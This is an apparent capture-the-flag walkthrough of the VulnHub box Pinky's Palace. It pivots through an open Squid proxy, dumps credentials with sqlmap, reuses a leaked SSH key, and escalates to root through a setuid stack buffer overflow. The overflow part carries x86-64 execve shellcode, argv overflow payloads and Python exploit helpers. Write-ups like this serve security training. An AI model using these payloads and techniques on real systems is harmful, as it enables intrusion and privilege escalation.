This one was a fun box. My second with a buffer overflow. I cheated a bit to take some shortcuts, trying to find a more efficient way than using gdb. I will publish the method I built using examples I found elsewhere, such as https://blaksec.com.
First:
Searching for the target:
nmap -Pn -T4 192.168.56.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-15 12:59 UTC
Nmap scan report for 192.168.56.100
Host is up (0.000096s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:58:FD:DE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up (0.00032s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
8080/tcp open http-proxy
31337/tcp open Elite
MAC Address: 08:00:27:A3:C5:2A (Oracle VirtualBox virtual NIC)
Running Interlace (first time I wanted to try this: it runs a list of commands such as nmap against multiple targets/scopes) while investigating ports 8080 and 31337:
Command:
interlace -tL /root/boxes/pinky/targets.txt -o /root/boxes/pinky/output -cL /root/boxes/pinky/commands.txt -threads 20
commands.txt:
nmap -Pn -sC -sV -oN _output_/_target_-initial.txt _target_
nmap -Pn -p- -oN _output_/_target_-tcp-allports.txt _target_
nmap -Pn -sU --top-ports 50 -oN _output_/_target_-udp-top50.txt _target_
targets.txt:
192.168.56.101
A few more results:
cat 192.168.56.101-tcp-allports.txt
# Nmap 7.70 scan initiated Mon Jul 15 13:02:11 2019 as: nmap -Pn -p- -oN /root/boxes/pinky/output/192.168.56.101-tcpallports.txt 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.00032s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
8080/tcp open http-proxy
31337/tcp open Elite
64666/tcp open unknown
cat 192.168.56.101-udp-top50.txt
# Nmap 7.70 scan initiated Mon Jul 15 13:02:11 2019 as: nmap -Pn -sU --top-ports 50 -oN /root/boxes/pinky/output/192.168.56.101-udp-top50.txt 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.00041s latency).
Not shown: 49 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
Trying to connect:
telnet 192.168.56.101 64666
Trying 192.168.56.101…
Connected to 192.168.56.101.
Escape character is '^]'.
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u2
ls
Protocol mismatch.
Connection closed by foreign host.
Port 8080 returns a 403 error from nginx/1.10.3.
Port 31337 returns "ERROR The requested URL could not be retrieved", an error page served by squid/3.5.23.
Did a searchsploit but it returned nothing good
Running dirbuster on 8080 and 31337:
Nothing for 8080
31337 returns I/O Errors
Trying to connect to port 64666 using Burp:
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u2
Protocol mismatch.
Trying to connect:
ssh 192.168.56.101 -p 64666
The authenticity of host '[192.168.56.101]:64666 ([192.168.56.101]:64666)' can't be established.
ECDSA key fingerprint is SHA256:V5qJjz+sQ8RoowMS4sNiH5d8pNwt6ayyKI68H2twYEo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.101]:64666' (ECDSA) to the list of known hosts.
root@192.168.56.101's password:
Permission denied, please try again.
So back to Squid…
If port 31337 is an open forward proxy, it can be asked to fetch pages from the target's own loopback interface, which the nginx on 8080 refuses to serve to us directly (hence the 403):
curl http://127.0.0.1:8080 -x 192.168.56.101:31337
<html>
<head>
<title>Pinky's HTTP File Server</title>
</head>
<body>
<center><h1>Pinky's HTTP File Server</h1></center>
<center><h3>Under Development!</h3></center>
</body>
<style>
html{
background: #f74bff;
}
It works…
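The curl -x trick above generalises: anything that only listens on the target's 127.0.0.1 is reachable through the open Squid on 31337, so the proxy can be used to port-scan the box's own loopback from outside. The following helper is an added example written for this write-up (it is not the author's code and not part of the box). It sends the absolute-URI request a forward proxy expects and tells a real answer (even an nginx 403) apart from Squid's own error pages by the X-Squid-Error header Squid adds to pages it generated itself (ERR_CONNECT_FAIL when the loopback port is closed, ERR_ACCESS_DENIED when an ACL refused the request). The sample responses in the block are constructed, not captured from the VM, and the file name proxy_pivot.py is my choice.

```python
#!/usr/bin/env python3
"""proxy_pivot.py: added example for the Squid pivot used in the write-up
(my code, not the author's).  Reaches services that only answer on the
target's loopback through the open forward proxy on 31337 and classifies
what comes back."""
import socket

PROXY = ("192.168.56.101", 31337)   # Squid, from the nmap scan


def proxy_request(host, port, path="/", method="GET"):
    """Build the request a forward proxy expects: the full URL goes in the
    request line and Host names the real origin, not the proxy."""
    return (f"{method} http://{host}:{port}{path} HTTP/1.1\r\n"
            f"Host: {host}:{port}\r\n"
            f"User-Agent: Mozilla/5.0\r\n"
            f"Connection: close\r\n\r\n").encode()


def parse_response(raw):
    """Split a raw HTTP response into (status, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def classify(raw):
    """'closed' : Squid could not connect to host:port (its own error page)
       'blocked': a Squid ACL refused the request (also Squid's own page)
       'open'   : something behind the proxy answered, whatever its status
                  code (an nginx 403 still proves a listener is there)."""
    _, headers, _ = parse_response(raw)
    err = headers.get("x-squid-error", "")
    if err.startswith("ERR_CONNECT_FAIL"):
        return "closed"
    if err.startswith("ERR_ACCESS_DENIED"):
        return "blocked"
    return "open"


def probe(host, port, path="/", proxy=PROXY, timeout=5):
    """Fetch http://host:port/path through the proxy; returns the raw bytes."""
    with socket.create_connection(proxy, timeout=timeout) as s:
        s.sendall(proxy_request(host, port, path))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def scan_loopback(ports, proxy=PROXY):
    """Port-scan the target's own 127.0.0.1 from the outside, via the proxy."""
    return {p: classify(probe("127.0.0.1", p, proxy=proxy)) for p in ports}


# Constructed sample responses (not captured from the box), in the shape
# Squid 3.5 and nginx produce, so the classifier can be exercised offline.
SAMPLE_OPEN = (b"HTTP/1.1 200 OK\r\nServer: nginx/1.10.3\r\n"
               b"Content-Type: text/html\r\n"
               b"Via: 1.1 pinkys-palace (squid/3.5.23)\r\n"
               b"Connection: close\r\n\r\n<title>Pinky's HTTP File Server</title>")
SAMPLE_NGINX_403 = (b"HTTP/1.1 403 Forbidden\r\nServer: nginx/1.10.3\r\n"
                    b"Connection: close\r\n\r\n<h1>403 Forbidden</h1>")
SAMPLE_CLOSED = (b"HTTP/1.1 503 Service Unavailable\r\nServer: squid/3.5.23\r\n"
                 b"X-Squid-Error: ERR_CONNECT_FAIL 111\r\n"
                 b"Connection: close\r\n\r\n<title>ERROR: The requested URL could not be retrieved</title>")
SAMPLE_BLOCKED = (b"HTTP/1.1 403 Forbidden\r\nServer: squid/3.5.23\r\n"
                  b"X-Squid-Error: ERR_ACCESS_DENIED 0\r\n"
                  b"Connection: close\r\n\r\n")

if __name__ == "__main__":
    print(proxy_request("127.0.0.1", 8080).decode())
    for name, raw in (("open", SAMPLE_OPEN), ("nginx 403", SAMPLE_NGINX_403),
                      ("closed", SAMPLE_CLOSED), ("blocked", SAMPLE_BLOCKED)):
        print(f"{name:10s} -> {classify(raw)}")
    # Live use against the lab (needs the VM up):
    # print(scan_loopback([22, 80, 3306, 8080, 64666]))
```

scan_loopback needs the VM on the network; the rest runs offline against the constructed samples.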
So now we can run dirb through the proxy as well (the small wordlist, as the output shows):
dirb http://127.0.0.1:8080 /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -p 192.168.56.101:31337
—————–
DIRB v2.22
By The Dark Raver
—————–
START_TIME: Tue Jul 16 15:40:03 2019
URL_BASE: http://127.0.0.1:8080/
WORDLIST_FILES: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
PROXY: 192.168.56.101:31337
—————–
GENERATED WORDS: 87568
—- Scanning URL: http://127.0.0.1:8080/ —-
==> DIRECTORY: http://127.0.0.1:8080/littlesecrets-main/
—- Entering directory: http://127.0.0.1:8080/littlesecrets-main/ —-
—————–
END_TIME: Tue Jul 16 15:43:45 2019
DOWNLOADED: 175136 - FOUND: 0
So let’s curl it:
curl http://127.0.0.1:8080/littlesecrets-main/ -x 192.168.56.101:31337
<html>
<head>
<title>Login</title>
</head>
<body>
<center>
<div class="titlelog">
<h1>Pinky's Admin Files Login</h1>
</div>
</center>
<center>
<div class="log">
<form action="login.php" method="post">
<h3>User:</h3>
<input type="text" name="user"/>
<h3>Password:</h3>
<input type="password" name="pass"/>
<input type="submit" value="Login"/>
</form>
</div>
</center>
</body>
<style>
html{
background: #f74bff;
}
</style>
<!-- Luckily I only allow localhost access to my webserver! Now I won't get hacked. -->
</html>
Funny!!!!!!
Also found logs.php, which logs every login attempt into a DB… so…
Running sqlmap through the proxy against the login form:
sqlmap --proxy=http://192.168.56.101:31337 --dbms=mysql --data="user=admin&pass=password&submit=Login" --url=http://127.0.0.1:8080/littlesecrets-main/login.php --level=5 --risk=3 --dump -T users
From the dump of the users table, password: 3pinkysaf33pinkysaf3
So log in as pinkymanage with it:
ssh -l pinkymanage -p 64666 192.168.56.101
pinkymanage@192.168.56.101's password:
Linux pinkys-palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 2 04:00:51 2018 from 127.0.0.1
pinkymanage@pinkys-palace:~$
Nothing in the user home.
Cannot access pinky's user home.
So moving to /tmp.
Trying to copy linenum.sh… didn't work. Maybe my network config.
So good old cut and paste!
Then:
./enum.sh -t > enum.txt
Also checking the web root under /var:
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ ll
total 16
drwxr-xr-x 2 root root 4096 Feb 2 2018 .
drwxr-xr-x 3 root root 4096 Feb 2 2018 ..
-rw-r--r-- 1 root root 99 Feb 2 2018 note.txt
-rw-r--r-- 1 root root 2270 Feb 2 2018 .ultrasecret
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ cat note.txt
Hmm just in case I get locked out of my server I put this rsa key here.. Nobody will find it heh..
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ cat .ultrasecret
…
The = at the end makes me think it's Base64 encoded.
Decoding it (ssh refuses a private key file that is group- or world-readable, so make sure its mode is 600 before using it):
base64 -d .ultrasecret >/tmp/ssh.key
-----BEGIN RSA PRIVATE KEY-----
…
-----END RSA PRIVATE KEY-----
Now I can login as pinky:
pinkymanage@pinkys-palace:/tmp$ ssh -l pinky -i /tmp/ssh.key -p 64666 192.168.56.101
Linux pinkys-palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Last login: Fri Feb 2 05:54:01 2018 from 172.19.19.2
An interesting executable in pinky's home:
ll
total 44
drwx------ 3 pinky pinky 4096 Jul 22 16:03 .
drwxr-xr-x 4 root root 4096 Feb 2 2018 ..
-rwsr-xr-x 1 root root 8880 Feb 2 2018 adminhelper
lrwxrwxrwx 1 root root 9 Feb 1 2018 .bash_history -> /dev/null
-rw-r--r-- 1 pinky pinky 220 Jan 28 2018 .bash_logout
-rw-r--r-- 1 pinky pinky 3526 Jul 22 16:03 .bashrc
lrwxrwxrwx 1 pinky pinky 9 Feb 1 2018 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 280 Feb 2 2018 note.txt
-rw-r--r-- 1 pinky pinky 675 Jan 28 2018 .profile
drwx------ 2 pinky pinky 4096 Feb 2 2018 .ssh
-rw------- 1 pinky pinky 2879 Jul 22 16:03 .viminfo
pinky@pinkys-palace:~$ cat note.txt
Been working on this program to help me when I need to do administrator tasks sudo is just too hard to configure and I can
never remember my root password! Sadly I'm fairly new to C so I was working on my printing skills because I'm not sure how
to implement shell spawning yet 🙁
pinky@pinkys-palace:~$ ./adminhelper
pinky@pinkys-palace:~$ ./adminhelper sss
sss
It is setuid root (the s in -rwsr-xr-x, and the file is owned by root) and it echoes whatever argument it is given, so let's try to overflow that argument:
pinky@pinkys-palace:~$ ./adminhelper $(python -c 'print "A" * 300')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
Bingo!
Now let's try to exploit it:
Crash it to verify the buffer overflow (done above).
Find where it's crashing, i.e. how many bytes it takes to reach the saved return address. This is what I will explain later… I need to make progress on this part. I could do it but not explain it properly.
Then put the shellcode, behind a NOP sled, into an environment variable (Python 2 syntax: print writes the string out byte for byte):
export MYEGG=$(python -c 'print("\x90" * 100 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")')
pinky@pinkys-palace:~$ echo $MYEGG
Let's find the address of MYEGG on the stack (that is where we will return into; this only works because the stack address is stable between processes, i.e. ASLR is off on this box):
vi getMYEGGAddr.c
#include <stdio.h>
#include <stdlib.h>

/* Print where the MYEGG environment string lives on this process's stack;
   the copy in the target process sits close to the same address. */
int main(void)
{
    char *addr = getenv("MYEGG");
    if (addr == NULL) {
        fprintf(stderr, "MYEGG is not set\n");
        return 1;
    }
    printf("MYEGG is at %p\n", (void *)addr);
    return 0;
}
gcc getMYEGGAddr.c -o getMYEGGAddr
pinky@pinkys-palace:/tmp$ ./getMYEGGAddr
MYEGG is at 0x7fffffffef58
The helper's address is not exactly where MYEGG sits inside adminhelper (a different program name and argument length shift the stack by a few bytes), which is what the 100-byte NOP sled is for. Now overwrite the saved return address, 72 bytes into the argument, with that address. The [::-1] reverses the six bytes into little-endian order; the string copy stops at the terminating NUL, and the two top bytes of a user-space return address are zero already, so six bytes are enough:
./adminhelper $(python -c 'print("A" * 72 + "\x7f\xff\xff\xff\xef\x58"[::-1])')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
# id
uid=1000(pinky) gid=1000(pinky) euid=0(root) groups=1000(pinky),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
# whoami
root
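Two things are worth noting about that id output: the shell keeps euid=0 but uid=1000, and it only does so because Debian's /bin/sh is dash; bash resets the effective uid to the real one at startup unless it is run with -p, so against a bash target the shellcode would need a setuid(0) first. Second, the whole chain depends on a fixed stack address, i.e. /proc/sys/kernel/randomize_va_space being 0, and on an executable stack, since we return into the environment string.

Pulling the steps above together, here is an added helper module (my own example code, not the write-up's and not part of the box) that does the parts the one-liners leave implicit: a pattern whose every 8-byte window is unique, so the bytes found in the return-address slot at the crash give the offset (72 here) directly; the argv payload with the address packed little-endian instead of the [::-1] reversal trick, refusing bytes that would not survive an unquoted $(...) or the string copy; the MYEGG egg with its NOP sled, aimed at the middle of the sled so a shift in either direction still lands in it; and a decoder that shows what the opaque 27-byte shellcode actually executes. Assumptions, stated as such: an x86-64 target that copies argv[1] into a fixed stack buffer with no canary, ASLR off, executable stack, and the file name bof_helpers.py. To read the pattern back: on x86-64 an overwritten return address such as 0x4141414141414141 is non-canonical, so the ret instruction itself faults and RIP is not changed; the eight pattern bytes are still at $rsp when the SIGSEGV is delivered (x/gx $rsp in gdb), and that value is what cyclic_find takes.

```python
#!/usr/bin/env python3
"""bof_helpers.py: added example for the 64-bit stack overflow in the
write-up (my code, not the author's and not shipped with the box).

Assumed, as labelled in the lead-in: an x86-64 target that copies argv[1]
into a fixed stack buffer with no canary, ASLR off, executable stack."""
import itertools
import struct

# The 27-byte x86-64 execve("/bin/sh") shellcode quoted in the write-up.
SHELLCODE = (b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb"
             b"\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"

# Bytes that do not survive an unquoted $(python ...) on the way into argv:
# NUL ends the string and the IFS characters split the argument.
BADCHARS = {0x00, 0x09, 0x0a, 0x20}


def _de_bruijn(alphabet, n):
    """Lazily yield a De Bruijn sequence B(k, n): every n-byte window occurs
    only once, so any window read back from memory pins down its offset."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=8):
    """First `length` bytes of the pattern; feed them as argv[1] in place of
    the 300 A's to learn the distance to the saved return address."""
    return bytes(itertools.islice(_de_bruijn(ALPHABET, n), length))


def cyclic_find(window, n=8, max_len=4096):
    """Offset of an n-byte window inside cyclic(max_len), or -1.  `window`
    may be the raw bytes or the integer read from the return-address slot
    ($rsp at the faulting ret), which gdb shows as a little-endian value."""
    if isinstance(window, int):
        window = struct.pack("<Q", window)[:n]
    return cyclic(max_len, n).find(bytes(window[:n]))


def argv_payload(offset, ret_addr, filler=b"A"):
    """Overflow string for argv[1]: `offset` bytes of filler, then the return
    address little-endian (what the [::-1] in the write-up does by hand).  A
    canonical user-space address is 0x00007fxxxxxxxxxx: the string copy stops
    at the first NUL and the top two bytes of the saved RIP are already zero,
    so only the six low bytes are sent; anything that needs a NUL or an IFS
    byte in the middle cannot be delivered this way and is rejected."""
    packed = struct.pack("<Q", ret_addr).rstrip(b"\x00")
    bad = sorted(set(packed) & BADCHARS)
    if bad:
        raise ValueError("address needs bytes that will not survive argv: "
                         + ", ".join(hex(b) for b in bad))
    return filler * offset + packed


def egg(shellcode=SHELLCODE, sled=100):
    """Value for the MYEGG environment variable: a NOP sled in front of the
    shellcode.  The sled absorbs the small shift of the stack between the
    getenv helper and the real target (a different argv[0] or argument
    length moves every environment string by some bytes)."""
    value = b"\x90" * sled + shellcode
    if b"\x00" in value:
        raise ValueError("environment strings are NUL-terminated")
    return value


def sled_target(egg_addr, sled=100):
    """Aim at the middle of the sled rather than at the address the helper
    printed, so the jump survives a shift in either direction."""
    return egg_addr + sled // 2


def shellcode_program(sc=SHELLCODE):
    """Recover the path this execve shellcode runs.  It loads the NUL-free
    negation of the string with movabs rbx, imm64 (bytes 48 bb) and undoes it
    with neg rbx; the tail is mov al, 0x3b (execve) followed by syscall."""
    if sc[2:4] != b"\x48\xbb" or sc[-4:] != b"\xb0\x3b\x0f\x05":
        raise ValueError("not the movabs/neg execve shellcode this decoder expects")
    imm = struct.unpack("<Q", sc[4:12])[0]
    restored = (-imm) & 0xFFFFFFFFFFFFFFFF
    return struct.pack("<Q", restored).rstrip(b"\x00").decode("ascii")


if __name__ == "__main__":
    pattern = cyclic(300)
    # Constructed: the value the return-address slot would hold if the buffer
    # is 72 bytes from the saved RIP, as it is for adminhelper.
    crashed_with = int.from_bytes(pattern[72:80], "little")
    offset = cyclic_find(crashed_with)
    print("offset to saved RIP:", offset)
    print("MYEGG:", egg().hex())
    print("shellcode runs:", shellcode_program())
    print("argv[1]:", argv_payload(offset, sled_target(0x7FFFFFFFEF58)))
```

Running the module prints the offset recovered from the constructed crash value, the egg, the program the shellcode executes and the final argument; on the box itself the pattern from cyclic(300) replaces the 300 A's, the value at $rsp after the crash goes into cyclic_find, and the resulting argv_payload is what ./adminhelper gets.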
# alias ll="ls -al"
# cd /root
# ll
total 40
drwx------ 3 root root 4096 Mar 5 2018 .
drwxr-xr-x 22 root root 4096 Jan 28 2018 ..
lrwxrwxrwx 1 root root 9 Feb 1 2018 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
lrwxrwxrwx 1 root root 9 Feb 2 2018 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 Feb 2 2018 .ssh
-rw------- 1 root root 14803 Mar 5 2018 .viminfo
-rw-r--r-- 1 root root 207 Mar 5 2018 root.txt
# cat root.txt
===========[!!!CONGRATS!!!]===========
[+] You r00ted Pinky’s Palace Intermediate!
[+] I hope you enjoyed this box!
[+] Cheers to VulnHub!
[+] Twitter: @Pink_P4nther
Flag: 99975cfc5e2eb4c199d38d4a2b2c03ce
Thanks @Pink_P4nther for the box. Lots of fun.
And thanks @vulnhub! A big part of my training!
See you for the next box and the buffer overflow walkthrough. Almost done writing it for 32 and 64 bits. My most challenging exercise so far!